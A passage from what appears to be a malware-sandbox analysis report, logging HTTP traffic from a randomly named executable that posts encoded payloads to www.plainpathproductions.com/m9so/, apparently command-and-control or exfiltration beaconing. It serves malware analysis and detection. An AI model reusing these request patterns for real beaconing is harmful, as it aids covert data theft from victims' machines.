                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.11.204979291.195.240.19807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:19.191752911 CET1169OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.plainpathproductions.com
                                                                                    Origin: http://www.plainpathproductions.com
                                                                                    Referer: http://www.plainpathproductions.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 52 31 31 76 56 77 68 34 5a 75 6f 2f 43 31 54 74 56 32 6e 72 5a 74 4e 63 61 42 6f 33 76 4a 61 32 34 50 2b 30 4f 41 55 30 6e 33 69 46 6f 66 73 56 55 34 42 34 6b 6e 4e 55 47 32 38 4c 64 38 36 2b 55 76 51 44 45 70 65 36 55 61 56 62 66 2b 77 35 61 50 2b 75 63 64 61 4b 39 78 38 66 43 41 36 2f 59 4b 74 59 71 4c 52 58 79 33 77 54 30 77 37 63 78 77 4e 7a 53 72 4a 33 59 67 33 63 68 66 33 4d 55 42 56 38 48 58 2f 55 66 35 35 6d 59 4b 6b 52 42 4b 66 74 4f 4b 6d 33 6c 2f 74 45 49 53 2b 39 62 67 77 49 43 77 45 6d 47 46 2f 4f 53 73 4b 61 4f 70 50 52 58 74 47 64 75 62 6a 6e 49 67 70 71 34 6c 6a 4c 39 30 30 48 4e 45 4b 50 6c 5a 55 67 39 33 39 6f 4f 57 66 5a 56 62 6b 35 51 75 38 6c 73 67 6f 44 70 57 51 30 30 4a 6b 56 65 34 79 70 5a 2b 4c 52 65 6f 4f 4d 37 49 39 53 57 4c 65 6b 68 47 6f 5a 32 39 55 45 36 49 4e 56 54 38 4e 57 69 63 6a 47 4a 2b 59 66 51 6a 55 2b 34 72 4e 42 58 31 45 44 6e 51 65 31 50 4c 4b 58 53 74 63 2b 49 4d 43 4d 66 4f 59 4b 49 4f 79 59 58 47 50 39 70 65 4b 6b 50 34 2b 4f 71 72 4d 42 56 33 50 59 6f 71 32 70 75 69 64 59 71 37 30 55 6f 52 6d 56 62 7a 4b 78 58 6c 38 66 70 4e 34 56 32 37 37 2b 6e 32 4e 6e 55 36 4a 43 64 43 48 51 68 59 33 52 76 38 35 32 72 36 7a 70 50 45 54 55 35 79 31 31 35 6b 54 2b 45 76 63 37 54 59 79 4f 4b 32 66 6f 38 38 64 39 38 34 66 73 63 54 77 6c 72 42 41 57 69 62 47 73 2f 47 70 78 75 35 4f 47 46 63 67 7a 74 77 44 65 4b 75 71 4b 54 69 79 6f 6f 76 37 49 54 42 49 7a 76 71 67 74 75 41 39 4b 4d 52 62 59 62 4e 39 48 37 63 50 4a 73 35 4f 45 6b 6b 4f 51 45 78 6e 63 6f 44 58 6a 74 57 73 45 50 48 58 4e 50 49 6f 7a 64 53 72 61 49 30 63 43 50 77 50 2b 31 52 66 4f 6d 6a 49 3d
                                                                                    Data Ascii: LFPxWlV=R11vVwh4Zuo/C1TtV2nrZtNcaBo3vJa24P+0OAU0n3iFofsVU4B4knNUG28Ld86+UvQDEpe6UaVbf+w5aP+ucdaK9x8fCA6/YKtYqLRXy3wT0w7cxwNzSrJ3Yg3chf3MUBV8HX/Uf55mYKkRBKftOKm3l/tEIS+9bgwICwEmGF/OSsKaOpPRXtGdubjnIgpq4ljL900HNEKPlZUg939oOWfZVbk5Qu8lsgoDpWQ00JkVe4ypZ+LReoOM7I9SWLekhGoZ29UE6INVT8NWicjGJ+YfQjU+4rNBX1EDnQe1PLKXStc+IMCMfOYKIOyYXGP9peKkP4+OqrMBV3PYoq2puidYq70UoRmVbzKxXl8fpN4V277+n2NnU6JCdCHQhY3Rv852r6zpPETU5y115kT+Evc7TYyOK2fo88d984fscTwlrBAWibGs/Gpxu5OGFcgztwDeKuqKTiyoov7ITBIzvqgtuA9KMRbYbN9H7cPJs5OEkkOQExncoDXjtWsEPHXNPIozdSraI0cCPwP+1RfOmjI=
                                                                                    Mar 18, 2024 14:49:19.375544071 CET299INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 13:49:19 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.11.204979391.195.240.19807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:21.894691944 CET2572OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.plainpathproductions.com
                                                                                    Origin: http://www.plainpathproductions.com
                                                                                    Referer: http://www.plainpathproductions.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 52 31 31 76 56 77 68 34 5a 75 6f 2f 43 31 54 74 56 32 6e 72 5a 74 4e 63 61 42 6f 33 76 4a 61 32 34 50 2b 30 4f 41 55 30 6e 33 71 46 76 6f 73 56 46 70 42 34 6a 6e 4e 55 59 47 38 4b 64 38 36 5a 55 76 59 50 45 70 43 71 55 59 74 62 63 70 30 35 62 39 6d 75 58 39 61 4c 7a 52 38 5a 54 51 36 72 59 4b 67 42 71 4c 46 48 79 6d 30 54 33 77 4c 63 32 48 35 77 50 4c 4a 35 59 67 33 62 32 50 33 79 55 42 51 69 48 58 7a 55 66 38 35 6d 43 63 67 52 47 5a 33 74 55 71 6d 30 72 66 74 42 44 79 2b 79 62 6a 4d 32 43 77 45 59 47 45 37 4f 53 72 65 61 50 75 62 57 53 39 47 64 74 62 6a 6b 5a 52 56 75 34 6c 2f 54 39 30 77 48 4e 47 4b 50 6d 35 55 67 74 47 39 72 48 57 66 54 43 37 6b 55 55 75 77 54 73 67 73 58 70 58 30 30 30 36 59 56 66 4c 61 70 56 36 2f 52 54 6f 50 71 2f 49 38 57 5a 72 65 47 68 43 30 7a 32 38 30 2b 36 4c 68 56 53 64 74 57 70 64 6a 5a 64 75 59 5a 62 44 56 2b 38 72 42 33 58 78 67 6c 6e 51 65 66 50 4f 71 58 53 65 45 2b 5a 39 43 4e 63 65 5a 4d 45 75 79 4a 42 32 44 6e 70 64 75 2f 50 35 33 44 71 73 30 42 57 58 50 59 34 64 69 71 67 53 64 68 6f 37 31 49 6d 78 6e 54 62 7a 58 61 58 68 6c 71 70 65 38 56 33 50 6e 2b 6a 6d 4e 67 45 61 4a 47 54 69 48 57 6c 59 33 52 76 38 38 48 72 36 76 70 50 30 37 55 34 43 46 31 39 33 4c 2b 4a 50 63 31 54 59 79 6c 4b 32 54 62 38 38 55 63 38 34 75 42 63 51 63 6c 72 77 51 57 6c 66 53 76 36 32 70 70 2f 4a 50 45 61 4d 74 6c 74 77 66 57 4b 75 37 31 51 53 65 6f 70 76 72 49 45 68 49 79 74 4b 68 6c 2b 67 39 63 49 52 58 63 62 4e 52 35 37 64 72 6e 73 36 4f 45 67 77 66 77 42 41 57 4b 36 51 58 6f 6d 79 77 64 42 45 33 45 43 36 38 49 61 6b 6a 64 47 6a 30 64 51 57 50 43 6f 51 2f 61 37 48 6a 77 52 61 4a 37 62 34 59 4d 62 53 39 36 70 76 43 47 4f 44 67 37 51 50 6f 52 70 37 53 34 66 69 4b 52 68 73 63 7a 57 37 52 62 6f 38 32 70 38 79 32 6b 4f 71 2b 4d 52 4d 34 58 64 6a 37 7a 57 7a 63 46 2b 57 73 75 77 63 49 77 7a 73 61 58 45 4b 31 65 2f 57 74 54 36 62 43 43 45 34 6b 72 77 68 58 42 39 6a 59 2b 75 44 39 35 36 54 56 48 41 4c 7a 64 54 65 6d 2f 50 34 66 2b 4b 52 6d 51 61 66 64 32 6d 5a 6b 59 57 4e 4a 64 59 52 31 36 54 36 4c 63 4d 67 73 59 54 57 56 63 44 69 52 47 31 6b 66 52 37 44 51 44 41 4a 65 39 5a 75 34 55 4d 68 6b 33 4c 50 53 58 67 41 4a 4f 44 74 59 41 56 58 72 4f 76 76 34 6c 62 76 6b 46 54 6b 48 38 75 72 41 2b 32 54 47 77 67 68 74 4c 39 63 67 63 63 43 36 79 57 45 4b 50 71 4e 4c 36 79 4a 52 6d 65 63 4a 55 59 6c 39 4f 67 4b 4b 36 4e 42 50 61 2f 51 2b 57 64 44 57 50 63 57 61 4c 74 2f 73 5a 64 73 42 78 47 6d 72 77 39 43 70 32 6c 47 44 7a 72 35 63 44 32 4d 78 68 53 41 4f 2b 71 6b 30 47 6c 47 56 46 47 67 43 56 52 30 45 6d 6c 57 68 54 75 46 71 36 6d 50 72 2b 63 6d 4d 2f 43 61 73 39 6f 76 73 66 52 76 6a 42 6e 69 56 79 5a 75 47 7a 51 58 6c 49 65 6e 62 41 4f 31 38 7a 70 78 77 55 67 6b 31 48 6b 34 59 6c 72 61 31 6d 74 4a 53 45 7a 6e 78 6a 76 53 48 4e 70 69 37 6a 50 41 35 78 67 4c 39 33 32 73 51 51 71 36 4f 37 4a 79 38 4c 56 77 32 67 45 4d 76 6b 6a 69 77 49 67 68 53 76 33 70 7a 63 42 4f 41 37 52 4e 33 59 50 70 6c 74 35 53 5a 39 48 65 58 77 59 58 6d 37 2f 6d 51 78 43 39 38 66 5a 52 6c 32 69 69 77 4e 48 31 2b 75 6b 37 72 6d 36 63 72 58 6d 5a 53 45 48 32 4f 4d 79 6f 59 68 7a 6f 75 6b 4b 41 4e 47 6f 30 54 79 50 36 57 45 58 32 4b 72 70 30 4f 50 46 63 47 4a 62 47 2b 79 6c 6c 43 54 64 4a 56 31 4e 42 67 34 32 6f 5a 31 48 46 31 43 5a 44 70 41 2f 62 78 38 72 6f 69 76 4e 53 57 38 42 34 74 4f 48 6f 30 42 7a 74 48 30 6f 39 4e 59 49 4a 4c 61 4e 52 64 48 55 68 46 72 56 36 79 31 46 6f 52 44 30 31 68 69 71 6c 7a 75 45 61 63 73 5a 6b 50 77 56 45 36 4d 6b 44 56 31 6c 59 65 51 49 71 43 45 4e 6c 71 6b 38 4d 45 69 2f 61 6e 30 6e 6c 31 45 4f 72 2b 6a 48 4b 50 5a 6c 39 65 49 63 75 64 58 68 69 6d 34 66 67 71 63 50 78 41 52 57 78 65 37 6f 72 49 5a 58 54 63 47 6c 59 64 47 37 36 50 58 72 2f 76 48 2b 42 38 34 50 50 6f 61 38 6e 70 6a 59 75 51 2b 35 54 54 6c 38 67 75 67 59 6f 74 43 33 34 39 73 70 68 2f 48 48 76 41 36 61 45 2f 4d 58 64 45 66 4c 4a 49 55 61 7a 34 36 37 76 30 54 4f 54 6c 39 4a 62 6d 75 65 48 37 2b 78 47 57 67 64 4d 2b 73 70 72 74 64 77 2f 36 63 77 64 7a 56 4c 55 42 37 62 4c 77 58 6c 34 68 54 43 41 43 58 55 38 76 68 39 76 64 51 59 64 45
                                                                                    Data Ascii: LFPxWlV=R11vVwh4Zuo/C1TtV2nrZtNcaBo3vJa24P+0OAU0n3qFvosVFpB4jnNUYG8Kd86ZUvYPEpCqUYtbcp05b9muX9aLzR8ZTQ6rYKgBqLFHym0T3wLc2H5wPLJ5Yg3b2P3yUBQiHXzUf85mCcgRGZ3tUqm0rftBDy+ybjM2CwEYGE7OSreaPubWS9GdtbjkZRVu4l/T90wHNGKPm5UgtG9rHWfTC7kUUuwTsgsXpX0006YVfLapV6/RToPq/I8WZreGhC0z280+6LhVSdtWpdjZduYZbDV+8rB3XxglnQefPOqXSeE+Z9CNceZMEuyJB2Dnpdu/P53Dqs0BWXPY4diqgSdho71ImxnTbzXaXhlqpe8V3Pn+jmNgEaJGTiHWlY3Rv88Hr6vpP07U4CF193L+JPc1TYylK2Tb88Uc84uBcQclrwQWlfSv62pp/JPEaMtltwfWKu71QSeopvrIEhIytKhl+g9cIRXcbNR57drns6OEgwfwBAWK6QXomywdBE3EC68IakjdGj0dQWPCoQ/a7HjwRaJ7b4YMbS96pvCGODg7QPoRp7S4fiKRhsczW7Rbo82p8y2kOq+MRM4Xdj7zWzcF+WsuwcIwzsaXEK1e/WtT6bCCE4krwhXB9jY+uD956TVHALzdTem/P4f+KRmQafd2mZkYWNJdYR16T6LcMgsYTWVcDiRG1kfR7DQDAJe9Zu4UMhk3LPSXgAJODtYAVXrOvv4lbvkFTkH8urA+2TGwghtL9cgccC6yWEKPqNL6yJRmecJUYl9OgKK6NBPa/Q+WdDWPcWaLt/sZdsBxGmrw9Cp2lGDzr5cD2MxhSAO+qk0GlGVFGgCVR0EmlWhTuFq6mPr+cmM/Cas9ovsfRvjBniVyZuGzQXlIenbAO18zpxwUgk1Hk4Ylra1mtJSEznxjvSHNpi7jPA5xgL932sQQq6O7Jy8LVw2gEMvkjiwIghSv3pzcBOA7RN3YPplt5SZ9HeXwYXm7/mQxC98fZRl2iiwNH1+uk7rm6crXmZSEH2OMyoYhzoukKANGo0TyP6WEX2Krp0OPFcGJbG+yllCTdJV1NBg42oZ1HF1CZDpA/bx8roivNSW8B4tOHo0BztH0o9NYIJLaNRdHUhFrV6y1FoRD01hiqlzuEacsZkPwVE6MkDV1lYeQIqCENlqk8MEi/an0nl1EOr+jHKPZl9eIcudXhim4fgqcPxARWxe7orIZXTcGlYdG76PXr/vH+B84PPoa8npjYuQ+5TTl8gugYotC349sph/HHvA6aE/MXdEfLJIUaz467v0TOTl9JbmueH7+xGWgdM+sprtdw/6cwdzVLUB7bLwXl4hTCACXU8vh9vdQYdEal5W27VRkJYVVHnunMjWuAzOr1d/hzCl11EZ2tzoYI6UETjA3Jz/ywAMLVfOgaUkhWV2TRTWlR5jwC5I5gSuHBNii0TiwwXlIE6b691TGgytEKOXNAL/LLO/t70TswCJkX7CpZaMzBtMwzOedeumsAv4u0r0/heZO2PMHFY//NXFGPzN70TfZtKP+Dxxnke8lea1UN3TmbHudGtKOk9f0tkEFZusvKDXQoQMnpoNqeDj30iyuh+xTMakfpLubBdoM0S0qs+rVruAPVp+N+y/qMKgB6TzDpXkrmFpk4aTTgIxREDNeqNj2HVqKz1n/8Meht5aw7MzL34l4gESe4SbsebpHuZ5J+nRagZcdv0Om0KWQq5/kYpfUdxBTGeqcanCAYHQSx5sXNDQbyHUZBd125xnI6u1mfV5JoA0buyjbOLXtWjpbvvkJinDnsuiIPAnk/fsabyx2mOT0jpwGGo9Bx+lRndTxWmCXD1g2aqaODumAZ2y8bU6tMOi2AUBD/H7eX+JMM5NUJ13DwWGWm1HC+cfiaE9x7Gg3XB5GFyTcY+iHGa4N/fEQWvut+xPXg1exc0pt1
                                                                                    Mar 18, 2024 14:49:21.894714117 CET3858OUTData Raw: 2b 66 63 56 4b 58 72 49 64 69 44 59 66 66 49 69 4b 42 69 71 6a 68 6e 6d 68 6c 54 55 71 4c 59 42 66 54 67 4d 48 79 52 67 77 59 34 70 43 65 62 62 57 34 55 6e 79 62 78 6f 4f 45 50 6c 4d 56 76 65 61 42 53 41 52 56 33 46 2f 57 70 69 6f 53 57 57 78 75
                                                                                    Data Ascii: +fcVKXrIdiDYffIiKBiqjhnmhlTUqLYBfTgMHyRgwY4pCebbW4UnybxoOEPlMVveaBSARV3F/WpioSWWxulCX6ADL9Rj2ShshB86EJK37Kw7J5MZVarLTnhKHgL/gRMI4Sx753ks2zRQ3B47VBj7ZIE5w0tSHzLT/mUdWXVkS7h/XR6PLn37ZvAUr1aOaq2N8bDR2sMsDYu86QSUFtJSCSl6udyVSfu21+RECZuPu794qarTRlA
                                                                                    Mar 18, 2024 14:49:21.894790888 CET6430OUTData Raw: 4a 2b 45 4c 69 6e 44 53 54 5a 65 4a 7a 56 56 4b 62 72 4b 43 63 36 75 4c 66 6e 38 56 43 69 6a 67 58 35 50 30 30 69 2f 52 73 54 56 54 46 76 67 6b 57 2b 64 59 44 64 5a 77 43 69 4a 5a 49 49 48 31 57 6c 76 36 78 41 48 67 47 71 39 61 76 37 59 32 6e 74
                                                                                    Data Ascii: J+ELinDSTZeJzVVKbrKCc6uLfn8VCijgX5P00i/RsTVTFvgkW+dYDdZwCiJZIIH1Wlv6xAHgGq9av7Y2ntDFUUIjbt+KIWBSSpsEeGz+84VshXLuUorrBdmdFIijTLKnlJgqPQSTHiH9wWyV1BYGY3CY1t0EaDQQeqwR4YbyjTW3n8BWpUv/uBQhtj/llX7kbG8qJ4Han6THPMyCjC3j97hgGRaapYnKpfnC9kGfMU+PXmsBRio
                                                                                    Mar 18, 2024 14:49:22.076925039 CET1286OUTData Raw: 45 57 63 42 33 65 79 4c 71 48 74 30 43 64 4d 77 79 59 59 55 77 46 51 31 34 57 48 47 6f 52 4e 50 36 64 78 4a 67 4f 39 6d 79 6f 52 35 6f 6e 58 52 35 42 77 64 46 72 32 5a 47 6f 77 63 79 6d 32 6e 57 36 50 39 37 51 4f 47 30 39 59 6f 59 48 32 42 70 37
                                                                                    Data Ascii: EWcB3eyLqHt0CdMwyYYUwFQ14WHGoRNP6dxJgO9myoR5onXR5BwdFr2ZGowcym2nW6P97QOG09YoYH2Bp7bN/PjrELIeRg8Z3O86q10kxMbiAR99mr/4lTlRYzCjRSdh6IY/XmPWRcBeoAfhYuOewwG+sgHxj8jX+/tdX8GYENGmH/fHQb7PhnSlpsxF/PFyklmJVCrEF6HNcfUkquIgLclSs84QmY5NEvSYBKNQR2lrn1jOeH1
                                                                                    Mar 18, 2024 14:49:22.077100992 CET16718OUTData Raw: 56 47 47 78 44 72 74 63 43 77 43 72 54 69 7a 53 43 78 41 73 70 4d 63 44 43 6a 74 54 68 4d 59 35 52 55 75 70 74 53 70 77 68 53 4d 36 4f 72 4f 65 61 6f 63 52 6b 57 78 66 4c 48 78 4b 63 36 30 56 6e 69 6d 39 50 45 46 46 5a 2f 74 64 65 4d 42 76 45 43
                                                                                    Data Ascii: VGGxDrtcCwCrTizSCxAspMcDCjtThMY5RUuptSpwhSM6OrOeaocRkWxfLHxKc60Vnim9PEFFZ/tdeMBvECLlSygHpPvsbTwXmHaoQKCrZrnsHCdAk+KuNPxNEfa4Zx3y3deFBebQygA3ImnNs2QDCabYK4tXrmWmWEjyoMezq65Cm+pA9XgGszj8mLYy+dRDmwxvqzkth8whP6Ty/wAMYyTRijIqX3lVKMq48+znO2Erpvr/Poi
                                                                                    Mar 18, 2024 14:49:22.077265978 CET5144OUTData Raw: 44 65 49 49 76 75 2f 66 31 63 66 63 6f 36 70 6d 67 54 39 78 44 65 64 4d 6e 71 34 4d 62 51 61 55 30 38 52 34 48 2f 35 51 54 42 44 34 33 4c 6c 66 4d 68 31 67 6d 57 66 33 37 43 6e 46 78 64 65 49 73 30 57 52 4d 34 76 58 4a 59 44 72 45 33 77 66 72 2f
                                                                                    Data Ascii: DeIIvu/f1cfco6pmgT9xDedMnq4MbQaU08R4H/5QTBD43LlfMh1gmWf37CnFxdeIs0WRM4vXJYDrE3wfr/ThK94AV1EbhnORtPnaWCSC3FhheoFNTf59q/j3FX1cj+zwhGuz6mOv6sGa8JH4J6hh9s4NEOzcQCfbOhZpT9D3reDyAJotvUCePSHaNGOq87H6idJ986BXGy3DRgbvzQukI1pjZUQjIrQYfzhkm4NWK4ttU8QA4Dk
                                                                                    Mar 18, 2024 14:49:22.077434063 CET1286OUTData Raw: 72 54 72 4a 2f 54 7a 2f 35 6c 73 69 75 2f 77 4a 74 61 65 66 58 2f 65 4a 33 76 76 67 63 55 57 68 66 54 61 4d 4a 4e 55 5a 45 6e 78 75 30 6a 79 2f 66 34 68 47 76 41 66 68 43 72 63 34 49 5a 54 4a 42 6e 61 46 36 57 45 66 49 42 71 52 39 75 38 61 7a 52
                                                                                    Data Ascii: rTrJ/Tz/5lsiu/wJtaefX/eJ3vvgcUWhfTaMJNUZEnxu0jy/f4hGvAfhCrc4IZTJBnaF6WEfIBqR9u8azRcA+UVdD2i9byta07TBSJF7z3CXhs/QgDnscrpVFMa3RYmnAjBgO1ECG9pw26rPp62UpgQFRrZUXrkg3B1sdxX4FxpW4NuP7u6dC8GwLvd63snmcohiuOVpTjMFaK8SyVg3FiBT6G4Mmlk1M1ykR3lymUaRbyXa3Jp
                                                                                    Mar 18, 2024 14:49:22.077569962 CET299INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 13:49:21 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                    Mar 18, 2024 14:49:22.077604055 CET1286OUTData Raw: 31 64 71 2f 2f 39 6c 56 48 68 31 47 37 2f 2b 50 48 70 70 65 7a 62 63 36 51 35 31 34 31 30 4e 65 52 42 37 77 74 44 68 39 35 64 42 69 33 4c 72 72 45 48 2f 63 42 30 4f 78 2b 35 33 6c 78 69 4c 55 50 38 4a 39 42 36 6e 6c 57 6a 68 39 36 42 6a 32 72 37
                                                                                    Data Ascii: 1dq//9lVHh1G7/+PHppezbc6Q51410NeRB7wtDh95dBi3LrrEH/cB0Ox+53lxiLUP8J9B6nlWjh96Bj2r7uXMIuRvKdqJE/VOB6Y1xutLUHmEKY4GuCR00JO+/wAqzRaRyZ5PadSgqSiQgqwmgro7VuHdkGXdQk2ZLow0Bm44jLEMaeqRxA7/7sjfs39+N02iDCKAq19Tk62qWPMpX5VHi0/hgF3JrxGV2y+ibjSyArXR/ILNb1
                                                                                    Mar 18, 2024 14:49:22.259129047 CET2572OUTData Raw: 41 52 6d 64 79 65 4d 78 32 54 65 62 58 6a 66 67 70 4a 55 55 67 34 76 54 49 7a 62 77 70 48 43 6b 42 45 58 2b 70 68 50 46 5a 45 63 7a 57 63 77 67 67 41 76 46 30 48 6e 46 50 77 47 68 62 70 54 71 2b 4f 6f 6b 67 77 5a 44 48 5a 45 51 73 34 43 2b 57 6e
                                                                                    Data Ascii: ARmdyeMx2TebXjfgpJUUg4vTIzbwpHCkBEX+phPFZEczWcwggAvF0HnFPwGhbpTq+OokgwZDHZEQs4C+WnotYHb6wSM+8LtlM4+8vfDrpXhpGsQTGY9Ewt3+hHjpNQYF3ZW3vEtNHRjE+uhj2z/zI8ujUzdCLZFU4RZDBodLsJp8TIFqQYtPIrVanmQ1qmatGvcCHuQPMyvp08x0p6XfgmJefWMG/hnsheYzBS21+mmeVmuW5Iq
                                                                                    Mar 18, 2024 14:49:22.259322882 CET10288OUTData Raw: 69 47 77 47 36 4a 72 70 44 76 4c 52 55 39 79 73 2b 76 75 68 54 65 58 41 77 51 6c 44 57 6b 4b 4b 6f 78 56 45 4a 31 6e 7a 6c 52 4f 2f 6c 50 4f 71 33 61 44 70 2b 73 72 45 37 44 70 63 6e 36 79 75 65 57 57 44 4c 4f 65 76 67 51 76 50 55 31 41 36 41 71
                                                                                    Data Ascii: iGwG6JrpDvLRU9ys+vuhTeXAwQlDWkKKoxVEJ1nzlRO/lPOq3aDp+srE7Dpcn6yueWWDLOevgQvPU1A6AqdwQ9DYNxYomsdAJRJysO7PjBgyp9bQGjphbiM09qy3jjWYDsJ/3myEPgzujFHd4jWoMRTiLcEC0jEfO2ESn/tLwSfK59G/J9ynCXZnFABjOsj4dD7eUNVDHP4f/J4yQcMJg22NIQ9DTUXfK7gTWataLIY49Psz7Su
                                                                                    Mar 18, 2024 14:49:22.259437084 CET2119OUTData Raw: 37 59 4c 73 50 52 35 73 75 46 72 39 6c 61 6c 72 77 2b 6d 2f 51 5a 4b 2b 4c 74 79 4d 74 44 5a 35 59 77 6b 2b 4c 6d 55 75 76 34 74 42 74 49 79 58 4d 36 35 6a 5a 42 6a 48 4e 46 68 63 62 2b 71 54 6d 73 4e 4c 58 50 6d 6a 49 6d 44 58 58 5a 35 6c 47 55
                                                                                    Data Ascii: 7YLsPR5suFr9lalrw+m/QZK+LtyMtDZ5Ywk+LmUuv4tBtIyXM65jZBjHNFhcb+qTmsNLXPmjImDXXZ5lGUMHHIUiGSqpJ/tIXfehoZhDI6PKUSV2aGLRn0w5bh+qm0GnbMgvYF6YA4eJedhd5j6sHO0t3oLojIhlVQktZNWfRCRZmcPyoOag7RrnP76NT4q/Q2Ozj32eI/Zc69M8NxiNC4tUn/a+XLyUi34ObvYDwzMNe+VMHoz


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.11.204979591.195.240.19807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:24.598413944 CET543OUTGET /m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.plainpathproductions.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:49:24.811172009 CET1286INHTTP/1.1 200 OK
                                                                                    date: Mon, 18 Mar 2024 13:49:24 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    x-powered-by: PHP/8.1.17
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
